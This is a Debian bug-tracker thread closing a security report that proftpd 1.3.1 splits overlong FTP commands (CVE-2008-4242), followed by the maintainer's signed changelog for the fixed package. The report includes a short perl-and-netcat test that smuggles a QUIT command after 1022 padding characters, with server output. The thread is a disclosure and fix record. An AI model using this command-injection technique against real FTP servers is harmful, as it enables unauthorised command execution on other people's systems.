Bug#502674: marked as done (proftpd-basic: command line split CSRF)

Debian Bug Tracking System Sun, 19 Oct 2008 14:51:11 -0700

Your message dated Sun, 19 Oct 2008 21:02:50 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#502674: fixed in proftpd-dfsg 1.3.1-15
has caused the Debian Bug report #502674,
regarding proftpd-basic: command line split CSRF
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
502674: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=502674
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

--- Begin Message ---

Package: proftpd-basic
Version: 1.3.1-14
Severity: grave
Tags: security
Justification: user security hole

Hi,

proftpd in debian is vulnerable to CVE-2008-4242:

> ProFTPD 1.3.1 interprets long commands from an FTP client as
> multiple commands, which allows remote attackers to conduct
> cross-site request forgery (CSRF) attacks and execute arbitrary FTP
> commands via a long ftp:// URI that leverages an existing session
> from the FTP client implementation in a web browser.

See:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4242

http://securityreason.com/achievement_securityalert/56

http://bugs.proftpd.org/show_bug.cgi?id=3115

There is a patch in proftpd CVS (src/netio.c 1.34 and src/main.c
1.345), but it will need backporting to the version in Debian.

The equivalent bugs in ftpd and ftpd-ssl are #500278 and #500518, but
the codebase has diverged enough that the patches aren't applicable.

To test for the vulnerability:

$  perl -e 'print "A"x1022,"QUIT\n"' | nc localhost 21
220 ProFTPD 1.3.1 Server (Debian) [10.1.1.2]
500 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 not understood
221 Goodbye.


This splits the command-line and then incorrectly honours the QUIT.

Ian.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686 (SMP w/1 CPU core)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages proftpd-basic depends on:
ii  adduser                   3.110          add and remove users and groups
ii  debconf                   1.5.24         Debian configuration management sy
ii  debianutils               2.30           Miscellaneous utilities specific t
ii  libacl1                   2.2.47-2       Access control list shared library
ii  libattr1                  1:2.4.43-1     Extended attribute shared library
ii  libc6                     2.7-15         GNU C Library: Shared libraries
ii  libcap1                   1:1.10-14      support for getting/setting POSIX.
ii  libncurses5               5.6+20081011-1 shared libraries for terminal hand
ii  libpam-runtime            1.0.1-4        Runtime support for the PAM librar
ii  libpam0g                  1.0.1-4        Pluggable Authentication Modules l
ii  libssl0.9.8               0.9.8g-13      SSL shared libraries
ii  libwrap0                  7.6.q-16       Wietse Venema's TCP wrappers libra
ii  netbase                   4.34           Basic TCP/IP networking system
ii  sed                       4.1.5-8        The GNU sed stream editor
ii  ucf                       3.0010         Update Configuration File: preserv
ii  update-inetd              4.31           inetd configuration file updater

proftpd-basic recommends no packages.

Versions of packages proftpd-basic suggests:
ii  openssl                       0.9.8g-13  Secure Socket Layer (SSL) binary a
pn  proftpd-doc                   <none>     (no description available)
pn  proftpd-mod-ldap              <none>     (no description available)
pn  proftpd-mod-mysql             <none>     (no description available)
pn  proftpd-mod-pgsql             <none>     (no description available)

-- debconf information:
* shared/proftpd/inetd_or_standalone: from inetd

--- End Message ---

--- Begin Message ---

Source: proftpd-dfsg
Source-Version: 1.3.1-15

We believe that the bug you reported is fixed in the latest version of
proftpd-dfsg, which is due to be installed in the Debian FTP archive:

proftpd-basic_1.3.1-15_i386.deb
  to pool/main/p/proftpd-dfsg/proftpd-basic_1.3.1-15_i386.deb
proftpd-dfsg_1.3.1-15.diff.gz
  to pool/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-15.diff.gz
proftpd-dfsg_1.3.1-15.dsc
  to pool/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-15.dsc
proftpd-doc_1.3.1-15_all.deb
  to pool/main/p/proftpd-dfsg/proftpd-doc_1.3.1-15_all.deb
proftpd-mod-ldap_1.3.1-15_i386.deb
  to pool/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-15_i386.deb
proftpd-mod-mysql_1.3.1-15_i386.deb
  to pool/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-15_i386.deb
proftpd-mod-pgsql_1.3.1-15_i386.deb
  to pool/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-15_i386.deb
proftpd_1.3.1-15_all.deb
  to pool/main/p/proftpd-dfsg/proftpd_1.3.1-15_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Francesco Paolo Lovergine <[EMAIL PROTECTED]> (supplier of updated proftpd-dfsg 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun, 21 Sep 2008 23:32:46 +0200
Source: proftpd-dfsg
Binary: proftpd proftpd-basic proftpd-doc proftpd-mod-mysql proftpd-mod-pgsql 
proftpd-mod-ldap
Architecture: source i386 all
Version: 1.3.1-15
Distribution: unstable
Urgency: high
Maintainer: Francesco Paolo Lovergine <[EMAIL PROTECTED]>
Changed-By: Francesco Paolo Lovergine <[EMAIL PROTECTED]>
Description: 
 proftpd    - versatile, virtual-hosting FTP daemon
 proftpd-basic - versatile, virtual-hosting FTP daemon - binaries
 proftpd-doc - Versatile, virtual-hosting FTP daemon - documentation
 proftpd-mod-ldap - versatile, virtual-hosting FTP daemon - LDAP module
 proftpd-mod-mysql - versatile, virtual-hosting FTP daemon - MySQL module
 proftpd-mod-pgsql - versatile, virtual-hosting FTP daemon - PostgreSQL module
Closes: 502674
Changes: 
 proftpd-dfsg (1.3.1-15) unstable; urgency=high
 .
   * Fixed debian/changelog for wrongly close #496622 instead of #497622.
   * [PATCH,SECURITY] New 3115.dpatch.
     Fixes a cross-site forgery based on long command use, CVE-2008-4242.
     (closes: #502674)
Checksums-Sha1: 
 c97d15973d5a676d5cc8ffb7a7dd9b2d159f1f3b 1321 proftpd-dfsg_1.3.1-15.dsc
 b1b9f5182abbcb32a720e1f69a34318f3f5a3309 97531 proftpd-dfsg_1.3.1-15.diff.gz
 c3129f4d874546f23416923eaf5001db3615c292 684572 proftpd-basic_1.3.1-15_i386.deb
 1fb2939fd4614b8c4058c407272c56f21d0c1d29 202492 
proftpd-mod-mysql_1.3.1-15_i386.deb
 dc89a972648ebcfcb9e6a55ae6a03125a6d1c6e2 201842 
proftpd-mod-pgsql_1.3.1-15_i386.deb
 a28b40c5ab1750f2b7dd5e807758a249db5edf23 211834 
proftpd-mod-ldap_1.3.1-15_i386.deb
 9d6a24c5674d59ddb0243fdc8507c3e558894b50 194510 proftpd_1.3.1-15_all.deb
 63046615a4e1e4f98a7c128f9ea6ce14bdc9082c 1255916 proftpd-doc_1.3.1-15_all.deb
Checksums-Sha256: 
 ebfe8803edae5d06a1bbb1c7e0f7c447eb63d16ea6228025227093f67496f494 1321 
proftpd-dfsg_1.3.1-15.dsc
 f684002fae48a0d05a38ed5cad89164b6064a24f248720553b04cf6bb1941a3a 97531 
proftpd-dfsg_1.3.1-15.diff.gz
 27499a107490259efd00992dd41364b6c363dfb7f5f1cb832f23fc5634ac4260 684572 
proftpd-basic_1.3.1-15_i386.deb
 ceecc9f7118a51223635ad2d807a75a7f3e29346eca51b906edbd20b2040b70c 202492 
proftpd-mod-mysql_1.3.1-15_i386.deb
 15a87d18e72e2d0675c2f0178ff89eb2dd5835db2908b54908d337d3cf18982c 201842 
proftpd-mod-pgsql_1.3.1-15_i386.deb
 e4c801e4db9c0e33e15c8d2b94aa3e44ac7f30b3847e213bd2b200d3af8a3a99 211834 
proftpd-mod-ldap_1.3.1-15_i386.deb
 d7b6137f6ef1595cf23df489d3e950a41ff827c60a61adc42f5ac6ee0642b4e5 194510 
proftpd_1.3.1-15_all.deb
 be06f886d32cdd5bd001f532c77b82eec92db29c5b82f544cfbe69cdf35ae94b 1255916 
proftpd-doc_1.3.1-15_all.deb
Files: 
 981d660d3a7aa5d17974ce0b5b92b155 1321 net optional proftpd-dfsg_1.3.1-15.dsc
 1e5840dc6945b7e97e640a87bfc44581 97531 net optional 
proftpd-dfsg_1.3.1-15.diff.gz
 e0fefa3fc3a8fba71bce622056180eef 684572 net optional 
proftpd-basic_1.3.1-15_i386.deb
 5f551dcc2644e34f3395b45ccbd9b779 202492 net optional 
proftpd-mod-mysql_1.3.1-15_i386.deb
 5c78b2dd0dfb539c0ff048475e923a5d 201842 net optional 
proftpd-mod-pgsql_1.3.1-15_i386.deb
 0a6161368d0b0af7de9794cbb0c1d047 211834 net optional 
proftpd-mod-ldap_1.3.1-15_i386.deb
 ec50823f6dc277dad1b271cd2f6fb4a0 194510 net optional proftpd_1.3.1-15_all.deb
 f556b945768c47be6df29a55d946fa4b 1255916 doc optional 
proftpd-doc_1.3.1-15_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkj7nfUACgkQpFNRmenyx0drPACfcornqvDnsU+6wF21cthTxKF9
AaAAoPufOw5rPBEWDN+KSCihkxxoHGFU
=bHMu
-----END PGP SIGNATURE-----

--- End Message ---

Bug#502674: marked as done (proftpd-basic: command line split CSRF)

Reply via email to